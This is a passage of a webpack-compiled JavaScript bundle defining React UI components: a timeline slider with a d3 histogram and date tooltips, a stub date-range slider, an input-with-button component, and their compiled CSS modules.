var cx = __WEBPACK_IMPORTED_MODULE_4_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_6__TimelineSlider_styl___default.a);
var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('lib:components:TimelineSlider'); // eslint-disable-line no-unused-vars
var formatDate = Object(__WEBPACK_IMPORTED_MODULE_1_d3_time_format__["timeFormat"])('%m/%d/%Y');

var histogramHeight = 50;

/**
 * Create a new xScale for mapping between the selected time range and the width
 * of the slider in pixels.
 *
 * TODO: This is almost exactly the same scale used for the histogram utils. In
 * fact it likely should be the same scale, however this doesn't use nice() (for
 * now)
 */
var createScale = function createScale(props) {
  var extent = props.extent,
      width = props.width,
      margin = props.margin;

  return Object(__WEBPACK_IMPORTED_MODULE_2_d3_scale__["scaleTime"])().domain(extent).range([0, width + margin]);
};

/**
 * NOTE: Nice-ing without a count in this case can often cause the domain to be
 * extended. This makes the timeline slider histogram longer in terms of domain
 * than the actual data represented by the graph, and since the actual slider
 * component of the timeline slider is not actually bound to the visual
 * histogram in any way (they are just derived from the same data) we want the
 * rendered histogram to match up as closely as possible with the rendered
 * slider. The underlying data may be the same but once rendered to pixels
 * differences can occur. Standardizing tick count minimizes that.
 */
var createHistogramUtils = function createHistogramUtils(props) {
  var extent = props.extent,
      width = props.width,
      margin = props.margin,
      nodeTimestamps = props.nodeTimestamps;

  var tickCount = 100;
  var histogramWidth = width + margin;

  var xScale = Object(__WEBPACK_IMPORTED_MODULE_2_d3_scale__["scaleTime"])().domain(extent).range([0, histogramWidth]).nice(tickCount); // Must nice with a count. See NOTE

  var createBins = Object(__WEBPACK_IMPORTED_MODULE_3_d3_array__["histogram"])().domain(xScale.domain()).thresholds(xScale.ticks(tickCount));

  var bins = createBins(nodeTimestamps);

  var yScale = Object(__WEBPACK_IMPORTED_MODULE_2_d3_scale__["scaleLinear"])().domain([0, Object(__WEBPACK_IMPORTED_MODULE_3_d3_array__["max"])(bins, function (x) {
    return x.length;
  })]).range([histogramHeight, 0]);

  return {
    bins: bins,
    xScale: xScale,
    yScale: yScale,
    width: histogramWidth
  };
};

var TimelineSlider = function (_React$Component) {
  _inherits(TimelineSlider, _React$Component);

  function TimelineSlider() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, TimelineSlider);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = TimelineSlider.__proto__ || Object.getPrototypeOf(TimelineSlider)).call.apply(_ref, [this].concat(args))), _this), _this.xScale = createScale(_this.props), _this.histogram = createHistogramUtils(_this.props), _this.dragDirection = 'east', _this.isDragging = false, _this.dragStart = null, _this.mouseHandleOffset = 0, _this.getDirectionalPosition = function (e) {
      if (_this.dragStart === null) return null;

      return {
        direction: _this.dragDirection,
        offset: e.pageX - (_this.dragStart || 0)
      };
    }, _this.getScaleMax = function () {
      return _this.xScale.range()[1];
    }, _this.getPositionValue = function () {
      return _this.props.value.map(_this.xScale);
    }, _this.updatePosition = function (e, cb) {
      var _pos = _this.getDirectionalPosition(e);

      if (!_pos) return;

      var direction = _pos.direction,
          offset = _pos.offset;

      var max = _this.getScaleMax();
      var nextPos = _extends({}, _this.startPos);

      // Current values

      var _this$getPositionValu = _this.getPositionValue(),
          _this$getPositionValu2 = _slicedToArray(_this$getPositionValu, 2),
          currentWest = _this$getPositionValu2[0],
          currentEast = _this$getPositionValu2[1];

      // Dragging the whole bar, not just one handle


      if (direction === 'both') {
        var _width = _this.startPos.east - _this.startPos.west;
        var nextEast = _this.startPos.east + offset;
        var nextWest = _this.startPos.west + offset;

        // Don't allow dragging the bar past the edges
        if (nextEast > max) {
          nextEast = max;
          nextWest = nextEast - _width;
        } else if (nextWest < 0) {
          nextWest = 0;
          nextEast = nextWest + _width;
        }

        nextPos.east = nextEast;
        nextPos.west = nextWest;
      } else {
        // Dragging a single handle
        var _pos2 = _this.startPos[direction] + offset;

        if (_pos2 < 0) {
          _pos2 = 0;
        } else if (_pos2 > max) {
          _pos2 = max;
        }

        // NOTE: This is where we would do the flip flop of direction if we were
        // going to support that feature. I haven't included it here in the hopes
        // of reducing overal complexity, since all this positioning logic is
        // already fairly difficult to follow.
        if (direction === 'west' && _pos2 > currentEast) {
          _pos2 = currentEast;
        } else if (direction === 'east' && _pos2 < currentWest) {
          _pos2 = currentWest;
        }

        nextPos[direction] = _pos2;
      }

      // We need to map from pixel values to timestamps
      var changeValue = [nextPos.west, nextPos.east].map(_this.xScale.invert).map(function (date) {
        return date.getTime();
      });

      // Emit the change. cb is passsed rather than simply calling
      // this.props.onChange since it is also used for the onEnd callback
      cb(changeValue);
    }, _this.startPos = {}, _this.handleDragStart = function (e) {
      e.preventDefault();
      var handle = e.target;
      // $FlowIssue: Flow is so bad with EventTarget
      var ew = handle.dataset.direction;
      // $FlowIssue
      var rect = handle.getBoundingClientRect();
      var x = e.clientX;

      var _this$getPositionValu3 = _this.getPositionValue(),
          _this$getPositionValu4 = _slicedToArray(_this$getPositionValu3, 2),
          west = _this$getPositionValu4[0],
          east = _this$getPositionValu4[1];

      // This is best drawn as apicture, but in words: We need the difference
      // between the left or right edge of the handle and the coordinate of the
      // mouse. Otherwise clicking within the handle will cause its edge to jump
      // over to the mouse, since we're not accounting for that small distance of
      // pixels from the mouse to the edge of the handle.


      _this.mouseHandleOffset = x - (ew === 'east' ? rect.right : rect.left);

      // Since we're using left/right for handle positioning we need to
      // distinguish which handle was dragged
      _this.dragDirection = ew;

      // Start the drag. The mousemove listener is constantly running so this flag
      // will allow it to short circuit when we're not actually dragging.
      _this.isDragging = true;

      // The start position is stored so that we can calculate the difference
      // between this and where the mouse is during and after a drag
      _this.dragStart = x;

      _this.startPos = { west: west, east: east };

      if (_this.props.onStart) {
        // $FlowIgnore
        _this.props.onStart(_this.getPositionValue());
      }
    }, _this.handleDrag = function (e) {
      if (!_this.isDragging) {
        return;
      }

      _this.updatePosition(e, _this.props.onChange);
    }, _this.handleDragStop = function (e) {
      _this.updatePosition(e, _this.props.onEnd);
      _this.isDragging = false;
      _this.dragStart = null;
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  /**
   * Get the max value for the scale. Just wrapped since it uses ugly indexing.
   */


  /**
   * Convert the controlled value prop to pixels rather than timestamps
   */
  // Flow is having trouble here since it sees [number,number] as a
  // touble type but [].map returns an array type.


  /**
   * The heavy lifting of determining position. Usually it is just startPos +
   * offset (offset can be negative). However, we also account for a few addition
   * validations:
   *
   * - Dragging the whole bar, which means updating east and west in tandem
   * - Dragging one of the handles up against the other. I.e. handling dragging
   *   overflow
   * - Dragging handles against the edges of the slide area. We don't want them
   *   to go outside the area
   */


  _createClass(TimelineSlider, [{
    key: 'render',
    value: function render() {
      var _this2 = this;

      // Determine whether the two tooltips are overlapping. NOTE: As stated in
      // the TODO below we do not measure the dom. This number was simply taken
      // from the width of the tooltip at the time of writing.
      var tooltipWidth = 110; // TODO: Refactor to measure DOM and make this reliable

      var _getPositionValue = this.getPositionValue(),
          _getPositionValue2 = _slicedToArray(_getPositionValue, 2),
          west = _getPositionValue2[0],
          east = _getPositionValue2[1];

      var overlapping = Math.abs(west - east) <= tooltipWidth + 10; // The +10 is to provide a small buffer
      var histogram = this.histogram;

      // NOTE: To get the pixel value for `right` we need the max value minus the
      // east value. For example, if our total pixel range is 0-800 and east is
      // 800 that means the right handle should be all the way at the end, meaning
      // right: 0.
      //
      // NOTE: mouseleave is important, NOT mouseout. mouseOUT will fire events
      // when the mouse moves over elements _within_ the div. So you get mouseout
      // events while dragging, which just won't do. The mouseLEAVE event fires
      // only when the mouse leaves the bounding box of this div, regardless of
      // what heppens within. This is what we want.
      //
      // Admitedly it would be nice if the dragging did not stop if the mouse was
      // still down, but to get that functionality we need a document-level
      // mouseup listener. We can do that, but let's leave it for a future rev.
      // Hopefully this will only be a minor inconvenience, if even that.

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          'data-selector': 'GraphControlsTimelineSlider',
          onMouseMove: this.handleDrag,
          onMouseUp: this.handleDragStop,
          onMouseLeave: this.handleDragStop /* See NOTE */,
          style: { height: this.props.height },
          className: cx('TimelineSlider', this.props.className) },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { ref: function ref(el) {
              _this2.slideArea = el;
            }, className: cx('slideArea') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { style: { left: Math.max(0, west), right: this.getScaleMax() - east /* See NOTE */ }, className: cx('slider') },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { className: cx('handle', 'w'), 'data-direction': 'west', onMouseDown: this.handleDragStart }),
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'div',
              { className: cx('body'), 'data-direction': 'both', onMouseDown: this.handleDragStart },
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(DateTooltip, {
                key: 'w',
                className: cx('DateTooltip', 'w', {
                  invertY: overlapping
                }),
                pos: 0,
                date: this.xScale.invert(west)
              }),
              __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(DateTooltip, {
                key: 'e',
                className: cx('DateTooltip', 'e'),
                pos: 'auto',
                date: this.xScale.invert(east)
              })
            ),
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { className: cx('handle', 'e'), 'data-direction': 'east', onMouseDown: this.handleDragStart })
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('histogram'), style: { width: histogram.width, height: histogramHeight } },
          histogram.bins.map(function (d, i) {
            var columnSpacing = 1;
            var marginWidth = (histogram.bins.length - 1) * columnSpacing;
            return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', {
              key: i,
              className: cx('bin'),
              style: {
                left: histogram.xScale(d.x0) + columnSpacing,
                top: histogram.yScale(d.length),
                // width: (this.props.width - marginWidth) / histogram.bins.length,
                // width: (histogram.width - marginWidth) / histogram.bins.length,
                width: Math.max(0, histogram.xScale(d.x1) - histogram.xScale(d.x0) - 1),
                height: histogram.yScale(0) - histogram.yScale(d.length)
              }
            });
          })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('extentSummary') },
          this.props.extent.map(function (x) {
            return new Date(x);
          }).map(formatDate).join(' to ')
        )
      );
    }
  }]);

  return TimelineSlider;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

TimelineSlider.defaultProps = {
  height: 30,
  width: 0,
  margin: 10
};

var DateTooltip = function (_React$Component2) {
  _inherits(DateTooltip, _React$Component2);

  function DateTooltip() {
    _classCallCheck(this, DateTooltip);

    return _possibleConstructorReturn(this, (DateTooltip.__proto__ || Object.getPrototypeOf(DateTooltip)).apply(this, arguments));
  }

  _createClass(DateTooltip, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          date = _props.date,
          pos = _props.pos;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          style: { left: pos },
          className: this.props.className },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: cx('date') },
          formatDate(date)
        )
      );
    }
  }]);

  return DateTooltip;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3608 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3609);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TimelineSlider.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TimelineSlider.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3609 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".TimelineSlider__grayButton__1Lpp80 {\n  background: linear-gradient(to bottom, #fcfcfc, #eee);\n  border: 1px solid #d9d9d9;\n  color: #4a4a4a;\n/*\n  New Redesign Buttons\n  DEBUG: Folders\n  */\n}\n.TimelineSlider__grayButton__1Lpp80:hover {\n  background: linear-gradient(to bottom, #f7f7f7, #b3b3b3);\n  color: #4a4a4a;\n}\n.TimelineSlider__grayButton__1Lpp80:hover {\n  color: #245da7;\n  background: #e7e6e4;\n}\n.TimelineSlider__TimelineSlider__1U1Zln {\n  border-top: 1px solid #e8ebed;\n  border-bottom: 1px solid #e8ebed;\n  background: #ededef;\n  width: 100%;\n}\n.TimelineSlider__histogram__1fgSAW {\n  position: absolute;\n  top: auto;\n  left: 30px;\n}\n.TimelineSlider__bin__mEBNkB {\n  position: absolute;\n  background: #e7be00;\n}\n.TimelineSlider__tooltips__1rVtSV {\n  position: absolute;\n  top: 50%;\n  left: 50%;\n  -webkit-transform: translate(-50%, -20%);\n          transform: translate(-50%, -20%);\n}\n.TimelineSlider__DateTooltip__cZwvz0 {\n  position: absolute;\n  top: 0;\n  text-align: center;\n  font-size: 10px;\n  transition: top 0.2s ease-out;\n  background: rgba(155,155,155,0.49);\n  font-size: 9px;\n  padding: 0 10px;\n  line-height: 13px;\n}\n.TimelineSlider__DateTooltip__cZwvz0.TimelineSlider__e__3_P00K {\n  right: 0;\n}\n.TimelineSlider__DateTooltip__cZwvz0.TimelineSlider__invertY__1D-450 {\n  top: -13px;\n}\n.TimelineSlider__DateTooltip__cZwvz0 .TimelineSlider__date__1x62Hk {\n  display: block;\n  -webkit-user-select: none;\n     -moz-user-select: none;\n      -ms-user-select: none;\n          user-select: none;\n  cursor: default;\n}\n.TimelineSlider__slideArea__dQ2T-6 {\n  position: absolute;\n  top: auto;\n  left: 30px;\n  right: 30px;\n  background: transparent;\n  height: 50px;\n  z-index: 2;\n  border-bottom: 1px solid #979797;\n}\n.TimelineSlider__slideArea__dQ2T-6:before {\n  content: '';\n  width: 10px;\n  height: 10px;\n  position: absolute;\n  background: transparent;\n  top: 0;\n  left: 0;\n  right: auto;\n  bottom: 0;\n  -webkit-transform: translateX(-100%);\n          transform: translateX(-100%);\n}\n.TimelineSlider__slideArea__dQ2T-6:after {\n  content: '';\n  width: 10px;\n  height: 10px;\n  position: absolute;\n  background: transparent;\n  top: 0;\n  left: auto;\n  right: 0;\n  bottom: 0;\n  -webkit-transform: translateX(100%);\n          transform: translateX(100%);\n}\n.TimelineSlider__slider__CPrB5W {\n  position: absolute;\n  top: 0;\n  bottom: 0;\n  background: transparent;\n  border-radius: 5px;\n  display: flex;\n  border-bottom: #245da7;\n}\n.TimelineSlider__body__3U-8L- {\n  position: relative;\n  flex: 1 100%;\n  background: rgba(74,74,74,0.1);\n  cursor: ew-resize;\n  cursor: -webkit-grab;\n  cursor: grab;\n}\n.TimelineSlider__body__3U-8L-:active {\n  cursor: -webkit-grabbing;\n  cursor: grabbing;\n}\n.TimelineSlider__extentSummary__t5mKsn {\n  position: absolute;\n  bottom: 5px;\n  left: 50%;\n  text-align: center;\n  -webkit-transform: translateX(-50%);\n          transform: translateX(-50%);\n  font-size: 10px;\n  font-weight: bold;\n}\n.TimelineSlider__handle__3np_lY {\n  cursor: ew-resize;\n  width: 2px;\n  height: 50px;\n  background: #979797;\n  flex-grow: 0;\n  flex-shrink: 0;\n  position: absolute;\n  z-index: 2;\n}\n.TimelineSlider__handle__3np_lY.TimelineSlider__w__26_q7O {\n  left: 0;\n  -webkit-transform: translateX(-100%);\n          transform: translateX(-100%);\n}\n.TimelineSlider__handle__3np_lY.TimelineSlider__e__3_P00K {\n  right: 0;\n  -webkit-transform: translateX(100%);\n          transform: translateX(100%);\n}\n.TimelineSlider__reset__1FtrLl {\n  position: absolute;\n  right: -45px;\n  -webkit-transform: translateX(50%);\n          transform: translateX(50%);\n  top: 0;\n  display: flex;\n}\n.TimelineSlider__reset__1FtrLl button {\n  padding: 0 6px;\n  font-size: 12px;\n  height: 26px;\n}\n.TimelineSlider__reset__1FtrLl button:first-child {\n  margin-right: 5px;\n}\n.TimelineSlider__disabled__MvbuFG {\n  pointer-events: none;\n  background: #e7e6e4;\n  color: #9c9c9c;\n}\n.dark .TimelineSlider__TimelineSlider__1U1Zln {\n  border-color: #304866;\n  background: #1a1c20;\n}\n.dark .TimelineSlider__TimelineSlider__1U1Zln .TimelineSlider__body__3U-8L- {\n  background: rgba(74,74,74,0.4);\n}\n.dark .TimelineSlider__grayButton__1Lpp80,\n.dark gray-button(),\n.dark:hover {\n  color: #fff;\n  background: #1a1c20;\n}\n", ""]);

// exports
exports.locals = {
	"grayButton": "TimelineSlider__grayButton__1Lpp80",
	"TimelineSlider": "TimelineSlider__TimelineSlider__1U1Zln",
	"histogram": "TimelineSlider__histogram__1fgSAW",
	"bin": "TimelineSlider__bin__mEBNkB",
	"tooltips": "TimelineSlider__tooltips__1rVtSV",
	"DateTooltip": "TimelineSlider__DateTooltip__cZwvz0",
	"e": "TimelineSlider__e__3_P00K",
	"invertY": "TimelineSlider__invertY__1D-450",
	"date": "TimelineSlider__date__1x62Hk",
	"slideArea": "TimelineSlider__slideArea__dQ2T-6",
	"slider": "TimelineSlider__slider__CPrB5W",
	"body": "TimelineSlider__body__3U-8L-",
	"extentSummary": "TimelineSlider__extentSummary__t5mKsn",
	"handle": "TimelineSlider__handle__3np_lY",
	"w": "TimelineSlider__w__26_q7O",
	"reset": "TimelineSlider__reset__1FtrLl",
	"disabled": "TimelineSlider__disabled__MvbuFG"
};

/***/ }),
/* 3610 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export DateRangeSlider */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_d3_scale__ = __webpack_require__(218);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__DateRangeSlider_styl__ = __webpack_require__(3611);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__DateRangeSlider_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__DateRangeSlider_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_3__DateRangeSlider_styl___default.a);

var DateRangeSlider = function (_React$Component) {
  _inherits(DateRangeSlider, _React$Component);

  /**
   * Set up the scale to map between the passed extent (timestamps) and the
   * width of the component.
   */
  function DateRangeSlider(props) {
    _classCallCheck(this, DateRangeSlider);

    var _this = _possibleConstructorReturn(this, (DateRangeSlider.__proto__ || Object.getPrototypeOf(DateRangeSlider)).call(this, props));

    _this.state = {
      selection: _this.props.extent,
      sliderWidth: _this.props.width
    };


    var scale = Object(__WEBPACK_IMPORTED_MODULE_1_d3_scale__["scaleTime"])().domain(props.extent).range([0, props.width]).nice();

    _this.scale = scale;
    return _this;
  }

  _createClass(DateRangeSlider, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { style: { width: this.props.width }, className: this.props.className },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { style: { width: this.state.sliderWidth }, className: cx('slider') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('span', { className: cx('handle', 'w') }),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('span', { className: cx('handle', 'e') })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', { className: cx('tooltips') })
      );
    }
  }]);

  return DateRangeSlider;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3611 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3612);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./DateRangeSlider.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./DateRangeSlider.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3612 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".DateRangeSlider__slider__2sARt1 {\n  width: 100%;\n  height: 100%;\n  background: #245da7;\n  opacity: 0.6;\n  cursor: all-scroll;\n  position: relative;\n}\n.DateRangeSlider__handle__2oBfNz {\n  display: block;\n  cursor: ew-resize;\n  position: absolute;\n  top: 50%;\n  height: 20px;\n  width: 5px;\n  background: #aaa;\n  border: solid 1px #333;\n  border-radius: 3px;\n}\n.DateRangeSlider__e__2rby7H {\n  right: 0;\n  -webkit-transform: translate(50%, -50%);\n          transform: translate(50%, -50%);\n}\n.DateRangeSlider__w__1XpmHX {\n  left: 0;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n}\n", ""]);

// exports
exports.locals = {
	"slider": "DateRangeSlider__slider__2sARt1",
	"handle": "DateRangeSlider__handle__2oBfNz",
	"e": "DateRangeSlider__e__2rby7H",
	"w": "DateRangeSlider__w__1XpmHX"
};

/***/ }),
/* 3613 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export InputWithButton */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__InputWithButton_styl__ = __webpack_require__(3614);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__InputWithButton_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__InputWithButton_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }






var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__InputWithButton_styl___default.a);

var Circle = function Circle(props) {
  var className = props.className,
      childProps = _objectWithoutProperties(props, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'span',
    _extends({ className: cx(className, 'Circle') }, childProps),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('span', { className: __WEBPACK_IMPORTED_MODULE_2__InputWithButton_styl___default.a.inner })
  );
};

var InputWithButton = function (_React$Component) {
  _inherits(InputWithButton, _React$Component);

  function InputWithButton() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, InputWithButton);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = InputWithButton.__proto__ || Object.getPrototypeOf(InputWithButton)).call.apply(_ref, [this].concat(args))), _this), _this.focus = function () {
      _this.input.focus();
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  /**
   * Expose focus functionality to the parent component via ref
   */


  _createClass(InputWithButton, [{
    key: 'render',
    value: function render() {
      var _this2 = this;

      var _props = this.props,
          children = _props.children,
          loading = _props.loading,
          disabled = _props.disabled,
          className = _props.className,
          props = _objectWithoutProperties(_props, ['children', 'loading', 'disabled', 'className']);

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('InputWithButton', className, { disabled: loading || disabled }) },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('input', _extends({ ref: function ref(el) {
            _this2.input = el;
          } }, props)),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('children') },
          loading ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Circle, { className: cx('Circle') }) : children
        )
      );
    }
  }]);

  return InputWithButton;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);
InputWithButton.defaultProps = {
  disabled: false,
  loading: false
};

/***/ }),
/* 3614 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3615);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./InputWithButton.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./InputWithButton.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3615 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
